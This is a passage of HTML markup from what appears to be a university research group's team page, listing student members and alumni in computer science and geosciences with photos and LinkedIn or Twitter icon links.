</div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c144\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c144 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c145-outer\">\n            <div data-colibri-id=\"182-c145\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c145 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c146\" class=\"d-block style-831 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c146-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c146-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"h-global-transition-all h-heading style-832 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c147\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c148\" class=\"h-text h-text-component style-833 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"style-835 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c150-outer\">\n            <div data-colibri-id=\"182-c150\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c150 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c151\" class=\"d-block style-831 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c151-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c151-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"h-global-transition-all h-heading style-832 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c152\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raiyan</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-text h-text-component style-833 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"style-835 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c158\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c158 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c209\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c209 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"h-global-transition-all h-heading style-926 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c211\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c159\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c159 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c160-outer\">\n            <div data-colibri-id=\"182-c160\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c160 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c161\" class=\"d-block style-913 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c161-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c161-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"h-global-transition-all h-heading style-914 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c162\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-text h-text-component style-915 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"style-917 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c165-outer\">\n            <div data-colibri-id=\"182-c165\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c165 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c166\" class=\"d-block style-918 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c166-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c166-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"h-global-transition-all h-heading style-914 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c167\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-text h-text-component style-915 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"style-919 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-920 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-914 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-915 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-921 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c175-outer\">\n            <div data-colibri-id=\"182-c175\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c175 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c176\" class=\"d-block style-922 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c176-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c176-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-914 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-text h-text-component style-915 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"style-923 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c180-outer\">\n            <div data-colibri-id=\"182-c180\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c180 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c181\" class=\"d-block style-913 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c181-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c181-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c182\" class=\"h-global-transition-all h-heading style-914 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c182\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-text h-text-component style-915 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"style-917 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 